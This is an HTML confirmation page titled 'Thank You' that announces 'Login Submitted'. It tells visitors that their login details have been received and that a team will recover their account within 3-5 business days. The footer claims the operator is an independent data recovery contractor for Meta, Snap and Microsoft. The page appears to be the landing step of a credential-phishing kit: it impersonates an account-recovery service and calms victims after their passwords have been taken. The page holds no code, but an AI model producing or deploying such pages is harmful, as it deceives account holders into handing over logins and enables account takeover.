<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="icon" type="image/png" href="drsllc.png">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Thank You</title>
    <style>
        body {
            font-family: Arial, sans-serif;
	    background: #000000 url("billie-holiday.png") repeat;
	    background-size: 100px 100px;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 1;
        }
        .message {
            background: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            display: inline-block;
        }
    </style>
</head>
<body>

    <div class="message">
        <h2>Login Submitted</h2>
        <p>Your login details have been received. A qualified team member will be able to recover your account in 3-5 business days and blacklist individual IP addresses with unauthorized access. You may be signed out of your account during this process. If you need assistance, please contact support.</p>
    </div>

<footer class="footer">
        Copyright © 2025 Data Recovery Services, LLC. All Rights Reserved. Data Recovery Services, LLC is an independent and encrypted data recovery contractor for Meta Platforms, Inc.; Snap Inc.; Microsoft Corporation.
    </footer>

</body>
</html>
